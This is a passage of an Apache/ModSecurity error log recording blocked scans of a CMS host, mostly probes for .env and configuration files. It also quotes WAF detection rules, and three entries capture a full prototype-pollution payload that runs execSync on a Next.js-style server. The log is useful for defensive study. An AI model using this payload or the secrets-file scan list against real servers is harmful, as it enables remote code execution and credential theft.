172.70.251.147:11960] [client 172.70.251.147] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-1500"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/.env.json"] [unique_id "abze3N4YyF1e-QDujo9tRQAAAUk"] [Fri Mar 20 07:45:00.199963 2026] [:error] [pid 14425:tid 14448] [client 172.70.251.148:12623] [client 172.70.251.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-1500"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/.env_backup"] [unique_id "abze3EMqeKc_GzeuAXANzgAAANU"] [Fri Mar 20 07:45:00.201015 2026] [:error] [pid 17713:tid 17802] [client 172.70.251.147:11958] [client 172.70.251.147] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-1500"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/.env~"] [unique_id "abze3OWNdVzdR4d4e6YX7AAAAQw"] [Fri Mar 20 07:45:00.201056 2026] [:error] [pid 17713:tid 17795] [client 172.70.250.215:9493] [client 172.70.250.215] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-1500"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/.env2"] [unique_id "abze3OWNdVzdR4d4e6YX7QAAAQU"] [Fri Mar 20 07:45:00.201952 2026] [:error] [pid 14425:tid 14431] [client 172.70.250.214:11558] [client 172.70.250.214] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-1500"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/.env1"] [unique_id "abze3EMqeKc_GzeuAXANzwAAAMQ"] [Fri Mar 20 07:45:00.210240 2026] [:error] [pid 17713:tid 17801] [client 172.70.251.104:11642] [client 172.70.251.104] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-1500"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/.env.dist"] [unique_id "abze3OWNdVzdR4d4e6YX7gAAAQs"] [Fri Mar 20 07:45:00.211435 2026] [:error] [pid 17713:tid 17813] [client 172.70.250.215:9500] [client 172.70.250.215] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-1500"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/.envrc"] [unique_id "abze3OWNdVzdR4d4e6YX7wAAARc"] [Fri Mar 20 07:45:00.213394 2026] [:error] [pid 17713:tid 17805] [client 172.70.251.103:9753] [client 172.70.251.103] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-1500"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/.env.production.bak"] [unique_id "abze3OWNdVzdR4d4e6YX8AAAAQ8"] [Fri Mar 20 07:45:00.213536 2026] [:error] [pid 26363:tid 26400] [client 172.70.250.215:9491] [client 172.70.250.215] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-1500"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/.env.dev.local"] [unique_id "abze3N4YyF1e-QDujo9tRgAAAUM"] [Fri Mar 20 07:45:00.213555 2026] [:error] [pid 26363:tid 26414] [client 172.70.250.215:9492] [client 172.70.250.215] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-1500"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/.env.prod"] [unique_id "abze3N4YyF1e-QDujo9tRwAAAVE"] [Fri Mar 20 07:45:00.213571 2026] [:error] [pid 26363:tid 26417] [client 172.70.251.147:11960] [client 172.70.251.147] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-1500"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/.env.orig"] [unique_id "abze3N4YyF1e-QDujo9tSAAAAVQ"] [Fri Mar 20 07:45:00.221856 2026] [:error] [pid 17713:tid 17812] [client 172.70.250.215:9493] [client 172.70.250.215] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-1500"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/.env.docker"] [unique_id "abze3OWNdVzdR4d4e6YX8QAAARY"] [Fri Mar 20 07:45:00.224938 2026] [:error] [pid 14425:tid 14445] [client 172.70.250.214:11558] [client 172.70.250.214] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-1500"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/.env.container"] [unique_id "abze3EMqeKc_GzeuAXAN0AAAANI"] [Fri Mar 20 07:45:00.227013 2026] [:error] [pid 17713:tid 17796] [client 172.70.250.215:9500] [client 172.70.250.215] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-1500"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/docker/.env"] [unique_id "abze3OWNdVzdR4d4e6YX8wAAAQY"] [Fri Mar 20 07:45:00.227047 2026] [:error] [pid 14425:tid 14446] [client 172.70.251.148:12623] [client 172.70.251.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-1500"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/docker-compose.env"] [unique_id "abze3EMqeKc_GzeuAXAN0QAAANM"] [Fri Mar 20 07:45:00.227988 2026] [:error] [pid 14425:tid 14436] [client 172.70.251.103:9747] [client 172.70.251.103] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-1500"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/server/.env"] [unique_id "abze3EMqeKc_GzeuAXAN0gAAAMk"] [Fri Mar 20 07:45:00.228066 2026] [:error] [pid 17713:tid 17803] [client 172.70.251.147:11958] [client 172.70.251.147] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-1500"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/docker/.env.local"] [unique_id "abze3OWNdVzdR4d4e6YX9AAAAQ0"] [Fri Mar 20 07:45:00.234447 2026] [:error] [pid 14299:tid 14353] [client 172.70.251.103:9749] [client 172.70.251.103] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-1500"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/srv/.env"] [unique_id "abze3IgHLbuvz2RS3ZspagAAAE4"] [Fri Mar 20 07:45:00.238635 2026] [:error] [pid 26363:tid 26413] [client 172.70.250.215:9491] [client 172.70.250.215] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-1500"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/web/.env"] [unique_id "abze3N4YyF1e-QDujo9tSQAAAVA"] [Fri Mar 20 07:45:00.240653 2026] [:error] [pid 26363:tid 26410] [client 172.70.250.215:9492] [client 172.70.250.215] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-1500"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/var/www/.env"] [unique_id "abze3N4YyF1e-QDujo9tSgAAAU0"] [Fri Mar 20 07:45:00.240692 2026] [:error] [pid 14299:tid 14332] [client 172.70.251.103:9741] [client 172.70.251.103] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-1500"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/site/.env"] [unique_id "abze3IgHLbuvz2RS3ZspawAAAEI"] [Fri Mar 20 07:45:00.240701 2026] [:error] [pid 17713:tid 17797] [client 172.70.250.215:9493] [client 172.70.250.215] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-1500"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/www/.env"] [unique_id "abze3OWNdVzdR4d4e6YX9QAAAQc"] [Fri Mar 20 07:45:00.241556 2026] [:error] [pid 14425:tid 14440] [client 172.70.250.214:11558] [client 172.70.250.214] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-1500"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/var/www/html/.env"] [unique_id "abze3EMqeKc_GzeuAXAN0wAAAM0"] [Fri Mar 20 07:45:00.249824 2026] [:error] [pid 26363:tid 26398] [client 172.70.251.104:11639] [client 172.70.251.104] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-1500"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/home/.env"] [unique_id "abze3N4YyF1e-QDujo9tTAAAAUE"] [Fri Mar 20 07:45:00.251171 2026] [:error] [pid 17713:tid 17790] [client 172.70.250.215:9500] [client 172.70.250.215] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-1500"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/root/.env"] [unique_id "abze3OWNdVzdR4d4e6YX9gAAAQA"] [Fri Mar 20 07:45:00.253391 2026] [:error] [pid 26363:tid 26409] [client 172.70.251.147:11960] [client 172.70.251.147] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-1500"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/.env_config"] [unique_id "abze3N4YyF1e-QDujo9tTQAAAUw"] [Fri Mar 20 07:45:00.254200 2026] [:error] [pid 14425:tid 14429] [client 172.70.251.148:12623] [client 172.70.251.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-1500"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/.env_settings"] [unique_id "abze3EMqeKc_GzeuAXAN1AAAAMI"] [Fri Mar 20 07:45:00.254925 2026] [:error] [pid 17713:tid 17794] [client 172.70.251.147:11958] [client 172.70.251.147] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-1500"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/.env.local.backup"] [unique_id "abze3OWNdVzdR4d4e6YX9wAAAQQ"] [Fri Mar 20 07:45:00.265459 2026] [:error] [pid 17713:tid 17804] [client 172.70.251.147:11962] [client 172.70.251.147] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-1500"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/.env_secret"] [unique_id "abze3OWNdVzdR4d4e6YX-AAAAQ4"] [Fri Mar 20 17:47:41.932871 2026] [:error] [pid 14425:tid 14431] [client 74.7.227.147:36512] [client 74.7.227.147] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".com"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms-1.dev-unit.com"] [uri "/event/organize@gmail.com"] [unique_id "ab1sHUMqeKc_GzeuAXA4JQAAAMQ"], referer: https://cms-1.dev-unit.com/event/%D8%AD%D8%AF%D8%AB-%D8%A7%D9%81%D8%AA%D8%B1%D8%A7%D8%B6%D9%8A-%D9%85%D9%87%D8%B1%D8%AC%D8%A7%D9%86-%D9%84%D9%88%D8%B3-%D8%A3%D9%86%D8%AC%D9%84%D9%88%D8%B3-a-cappella-2021 [Sat Mar 21 19:42:22.554606 2026] [access_compat:error] [pid 12396:tid 12404] [client 185.254.197.90:43544] AH01797: client denied by server configuration: /home/id/cms-1.dev-unit.com/core/.env [Sun Mar 22 13:44:25.125352 2026] [access_compat:error] [pid 8222:tid 8320] [client 185.254.197.90:42306] AH01797: client denied by server configuration: /home/id/cms-1.dev-unit.com/core/.env [Tue Mar 24 00:56:43.630326 2026] [access_compat:error] [pid 15133:tid 15163] [client 103.158.121.26:39318] AH01797: client denied by server configuration: /home/id/cms-1.dev-unit.com/core/phpinfo [Tue Mar 24 01:03:45.476469 2026] [access_compat:error] [pid 14360:tid 14473] [client 103.158.121.26:48144] AH01797: client denied by server configuration: /home/id/cms-1.dev-unit.com/core/.env [Tue Mar 24 10:20:27.588449 2026] [:error] [pid 25696:tid 25720] [client 13.60.53.112:46632] [client 13.60.53.112] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271)) | base64 -w 0').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22, \\x22_chunks\\x22: \\x22$Q2\\x22, \\x22_..."] [sever [hostname "cms-1.dev-unit.com"] [uri "/"] [unique_id "acJJS32LSUxmPG45vhNyEwAAAVY"] [Tue Mar 24 10:20:27.630988 2026] [:error] [pid 25696:tid 25698] [client 13.60.53.112:46632] [client 13.60.53.112] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271)) | base64 -w 0').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22, \\x22_chunks\\x22: \\x22$Q2\\x22, \\x22_..."] [sever [hostname "cms-1.dev-unit.com"] [uri "/"] [unique_id "acJJS32LSUxmPG45vhNyFAAAAUA"] [Tue Mar 24 10:20:27.682917 2026] [:error] [pid 25696:tid 25700] [client 13.60.53.112:46632] [client 13.60.53.112] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:[\\"\\\\'][ ]*(([^a-z0-9~_:\\\\' ])|(in)).+?\\\\(.*?\\\\))" at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_xss_attacks.conf"] [line "506"] [id "973335"] [rev "2"] [msg "IE XSS Filters - Attack Detected."] [data "Matched Data: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22throw Object.assign(new Error('NEXT_REDIRECT') found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22throw Object.ass..."] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "cms-1.dev-unit.com"] [uri "/"] [unique_id "acJJS32LSUxmPG45vhNyFgAAAUI"] [Wed Mar 25 16:09:04.659430 2026] [:error] [pid 31819:tid 31880] [client 20.48.232.178:4075] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/index.php [Fri Mar 27 15:16:42.725827 2026] [:error] [pid 13682:tid 13709] [client 20.151.201.236:20491] [client 20.151.201.236] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".ini"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms-1.dev-unit.com"] [uri "/php.ini"] [unique_id "acaDOjxNrHzm7MTk15yk9AAAAUE"] [Fri Mar 27 19:06:55.890938 2026] [:error] [pid 887:tid 902] [client 158.94.208.241:48030] [client 158.94.208.241] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ 